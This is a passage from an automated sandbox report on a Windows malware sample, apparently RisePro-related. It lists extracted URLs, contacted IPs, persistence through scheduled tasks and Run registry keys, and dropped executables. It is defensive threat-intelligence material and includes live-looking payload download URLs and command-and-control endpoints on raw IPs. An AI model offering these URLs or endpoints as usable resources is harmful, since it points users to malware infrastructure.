                                                                                                                                https://t.me/RiseProSUPPORTMPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.000000000136D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.0000000001218000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.0000000000568000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000176E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://t.me/risepro_botlater9RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.ecosia.org/newtab/c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://www.youtube.com/accountfmF(831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://t.me/risepro_bot(mRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://ipinfo.io/RageMP131.exe, 0000002D.00000002.3206727588.00000000017AE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000179F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://www.youtube.com/accountT)831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://db-ip.com/demo/home.php?s=81.181.57.52?qc884f8452a.exe, 00000014.00000002.3279923051.0000000007ED6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLMPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://www.winimage.com/zLibDllDpRTpRc884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          http://147.45.47.102:57893/hera/amadka.exec884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://www.youtube.com/accountd831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://ipinfo.io:443/widget/demo/81.181.57.52#&Kc884f8452a.exe, 00000024.00000002.3143187486.000000000058D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://193.233.132.56/Pneh2sXQk0/index.php?wal=1ame=rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.youtube.com/accountp831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://193.233.132.167/cost/lenin.exe.eRc884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://ipinfo.io:443/widget/demo/81.181.57.52c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchc884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://ipinfo.io/tMPGPH131.exe, 0000001D.00000002.3253650821.000000000125C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://t.WUc884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://193.233.132.167/cost/lenin.exec884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://193.233.132.167/cost/go.exeeroc884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://t.me/risepro_botriseproc884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://db-ip.com/JRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://db-ip.com/Kc884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://db-ip.com:443/demo/home.php?s=81.181.57.52c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.000000000058D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2803800897.0000029E9006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoc884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://t.me/RiseProSUPPORTYoMPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://t.me/risepro_botisepro_botPc884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.2784637428.0000029E81633000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://t.me/RiseProSUPPORT%c884f8452a.exe, 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://www.winimage.com/zLibDllDpITpIRageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                              https://ipinfo.io/Mozilla/5.0c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://193.233.132.56/Pneh2sXQk0/index.php?wal=1Erundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://t.me/RiseProSUPPORTrsMPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://193.233.132.56/esIrundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://t.me/risepro_botomaniac884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://ac.ecosia.org/autocomplete?q=c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000012.00000003.2839947296.0000014EAB7F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://t.me/risepro_botRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.0000000001815000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://t.me/risepro_botlaterMPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://www.youtube.com/account7831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://www.winimage.com/zLibDllc884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                                                    https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                      34.117.186.192
                                                                                                                                                                                                                                      		ipinfo.ioUnited States
                                                                                                                                                                                                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                      142.250.9.104
                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                      104.26.5.15
                                                                                                                                                                                                                                      		db-ip.comUnited States
                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                      193.233.132.56
                                                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                                                      		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                      147.45.47.93
                                                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                                                      		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                      142.250.9.99
                                                                                                                                                                                                                                      		www.google.comUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                      64.233.185.136
                                                                                                                                                                                                                                      		youtube-ui.l.google.comUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                      142.250.105.100
                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                      193.233.132.167
                                                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                                                      		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                      		unknownReserved
                                                                                                                                                                                                                                      		unknownunknownfalse
                                                                                                                                                                                                                                      108.177.122.101
                                                                                                                                                                                                                                      		www3.l.google.comUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                      74.125.138.101
                                                                                                                                                                                                                                      		play.google.comUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                      147.185.221.19
                                                                                                                                                                                                                                      		b-stamps.gl.at.ply.ggUnited States
                                                                                                                                                                                                                                      		12087SALSGIVERUStrue

                                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                      192.168.2.5
                                                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                      Analysis ID:1428500
                                                                                                                                                                                                                                      Start date and time:2024-04-19 03:27:05 +02:00
                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                      Overall analysis duration:0h 21m 22s
                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                      Number of analysed new started processes analysed:59
                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                      Sample name:SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@106/196@19/15
                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 80%
                                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 72.21.81.240, 192.229.211.108, 172.253.124.94, 173.194.219.101, 173.194.219.100, 173.194.219.138, 173.194.219.113, 173.194.219.139, 173.194.219.102, 142.250.105.84, 34.104.35.123, 74.125.138.94, 142.250.9.94, 142.250.9.95, 64.233.176.95, 173.194.219.95, 142.250.105.95, 172.217.215.95, 74.125.138.95, 64.233.185.95, 64.233.177.95, 172.253.124.95, 74.125.136.95, 23.33.136.127, 108.177.122.95, 142.251.15.95, 173.194.219.84, 64.233.176.84, 20.42.65.92, 142.250.105.94, 104.26.12.31, 104.26.13.31, 172.67.75.172, 74.125.136.139, 74.125.136.102, 74.125.136.113, 74.125.136.138, 74.125.136.100, 74.125.136.101, 172.253.124.84, 142.250.9.84
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, optimizationguide-pa.googleapis.com, www.bing.com, clients1.google.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com
                                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3176 because it is empty
                                                                                                                                                                                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      03:27:59Task SchedulerRun new task: explorha path: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      03:29:02API Interceptor13981199x Sleep call for process: explorha.exe modified
                                                                                                                                                                                                                                      03:29:08API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                      03:29:13Task SchedulerRun new task: chrosha path: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      03:29:16API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                      03:29:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 831840b410.exe C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      03:29:23Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      03:29:23Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      03:29:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      03:29:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                      03:29:42API Interceptor1467451x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                                      03:29:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 831840b410.exe C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      03:29:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      03:29:54API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                      03:30:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                      03:30:02API Interceptor9859532x Sleep call for process: chrosha.exe modified
                                                                                                                                                                                                                                      03:30:34API Interceptor1210269x Sleep call for process: build12.exe modified

                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      C:\ProgramData\MPGPH131\MPGPH131.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
